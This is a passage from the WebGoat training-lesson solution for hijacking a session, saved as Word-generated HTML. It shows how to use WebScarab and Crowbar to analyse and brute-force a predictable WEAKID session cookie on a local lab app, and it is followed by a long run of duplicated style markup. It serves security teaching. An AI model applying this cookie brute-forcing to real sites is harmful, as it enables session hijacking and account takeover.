Clicking base response tries the first WEAKID and sets its response as the control. This first number indicates how similar this response is to the base response. A value of 1 means the responses are identical. The further the number is from 1, the more different this response is.<br/>
<br/>
<b>0.99969 : <font color="red">417</font> : : Hijack a Session</b><br/>
This second number is the value replacing the <b>##1##</b> in our request.<br/><br/>
<b>0.99969 : 417 : : <font color="red">Hijack a Session</font></b><br/>
The last portion is the title of the response page. In this case, if it's not &quot;Hijack a Session&quot;, something went wrong.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
The value indicating similarity to the base response will tell us which WEAKID worked. If everything went swimmingly, there should only be three values for this number. Look again at the screenshot above. There are many responses showing .99969, one showing .9949, then many more showing .99954. The response stayed the same until we got to the WEAKID ending in 429, then it changed. This is where the brute force succeeded. Right click on this response and click &quot;Show Response&quot;.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The easiest
way to complete this lesson is to use WebScarab's Session ID Analysis.<o:p></o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image006.jpg"><br/>
<font size="2"><b>This WEAKID worked! We hijacked this session.</b></font><br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
Refreshing the lesson should show it is complete.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Go to
WebScarab and click on the button "SessionID Analysis". Select the last POST
request from the "Previous requests" drop-down box.<o:p></o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_786"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image021.jpg" v:shapes="Picture_x0020_786"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> WebScarabs SessionID Analysis<span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To make sure
that WebScarab is able to fetch the WEAKID cookie, you need to click the "Test"
button on the bottom of the screen. A pop-up window must be shown like below.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_787"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image005.png" o:title="" cropbottom="2719f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="lesson_solutions/WeakSessionID_files/image022.jpg" v:shapes="Picture_x0020_787"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> SessionID WEAKID discovered<span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you dont
have a pop-up window with the Extracted Sessionids, you must edit the Request.
You must delete the WEAKID value from the request. Without this cookie value,
WebGoat will return a HTTP Header "Set-Cookie: WEAKID=value" so WebScarab
learns about this value.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Fetch 50
samples and examine the results. Enter "50" in the "Samples" window and click
the button "Fetch". You will not see any information about progress.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_788" o:spid="_x0000_i1031"
type="#_x0000_t75" style='width:480pt;height:17.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" croptop="61471f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=23
src="lesson_solutions/WeakSessionID_files/image023.jpg" v:shapes="Picture_x0020_788"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you need
to go to the tab "Analysis".<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_789" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:480pt;height:53.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" cropbottom="52914f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=71
src="lesson_solutions/WeakSessionID_files/image024.jpg" v:shapes="Picture_x0020_789"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In the "Analysis"
pane you see nothing. <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_790" o:spid="_x0000_i1029"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image010.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image025.jpg" v:shapes="Picture_x0020_790"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You must
select the Session Identifier WEAKID value from the drop-down box.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_791" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image012.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image026.jpg" v:shapes="Picture_x0020_791"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The WEAKID is
divided in 2 parts: the first part is an identifier that is added 1 in every
cookie and a time value. The time value is calculated at the moment that you
submit the request.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Notice that
there is sometimes a gap in the first value of the WEAKID, skipping with 1. The
value that is missing is the value that you need to know to log on. Now you
only need to calculate the timestamp. This can be brute-forced using Crowbar.
You know the previous timestamp and the next timestamp so you have a start and
end value.<br>
You can download Crowbar for free: <a href="http://www.sensepost.com/research/crowbar/" target="_blank">http://www.sensepost.com/research/crowbar/</a>
<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_792" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480.75pt;height:338.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image014.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=641 height=451
src="lesson_solutions/WeakSessionID_files/image027.jpg" v:shapes="Picture_x0020_792"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>There is a
value 16935 and a value 16937 with a numeric difference of 28110 instead of
14109, so there the WEAKID cookie is located. Copy and paste the raw HTTP
request in Crowbar:<o:p></o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_793"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:447pt;height:382.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image016.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=596 height=510
src="lesson_solutions/WeakSessionID_files/image028.jpg" v:shapes="Picture_x0020_793"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Crowbar<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change target
to localhost and adjust the port.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Create a Base
response. Make sure that you see "How to hijack a session" in the middle
window.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Insert ##1##
in the WEAKID parameter where you want to brute-force the value and be aware, that the first part of the WEAKID is the one we are searching for (16936).
The WEAKID in Crowbar lookes like this: Cookie: JSESSIONID=...; WEAKID=1693<font color="ff0000">6</font>-1163685<font color="ff0000">##1##</font>;<br>
Start the first loop at 363093, the last digits of the last cookie before the
authentication cookie and 363203, the first cookie after the authentication
cookie. You have to enter these two values in the Parameter1 fields. We have to brute-force these values, but we are sure that they lie
between these two boundaries.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Examine the
results until you see a different fuzzy logic value (the blue line in Figure 3), right-click it and click on "Show
reply".<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_794"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:481.5pt;height:345.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image018.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=461
src="lesson_solutions/WeakSessionID_files/image029.jpg" v:shapes="Picture_x0020_794"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Lesson 12 Completed<span style='font-family:
"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><o:p>&nbsp;</o:p></p>
</div>
<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
<tr>
<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
Solution by Erwin Geirnaert
</td>
<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
</tr>
</table>
</body>
</html>


@ -0,0 +1,889 @@
<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: How to Hijack a Session</title>
<link rel=File-List href="lesson_solutions/WeakSessionID_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WeakSessionID_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>egeirnaert</o:Author>
<o:LastAuthor>egeirnaert</o:LastAuthor>
<o:Revision>3</o:Revision>
<o:TotalTime>27</o:TotalTime>
<o:Created>2007-07-11T10:54:00Z</o:Created>
<o:LastSaved>2007-07-12T15:30:00Z</o:LastSaved>
<o:Pages>3</o:Pages>
<o:Words>469</o:Words>
<o:Characters>2677</o:Characters>
<o:Company> </o:Company>
<o:Lines>22</o:Lines>
<o:Paragraphs>6</o:Paragraphs>
<o:CharactersWithSpaces>3140</o:CharactersWithSpaces>
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="lesson_solutions/WeakSessionID_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WeakSessionID_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
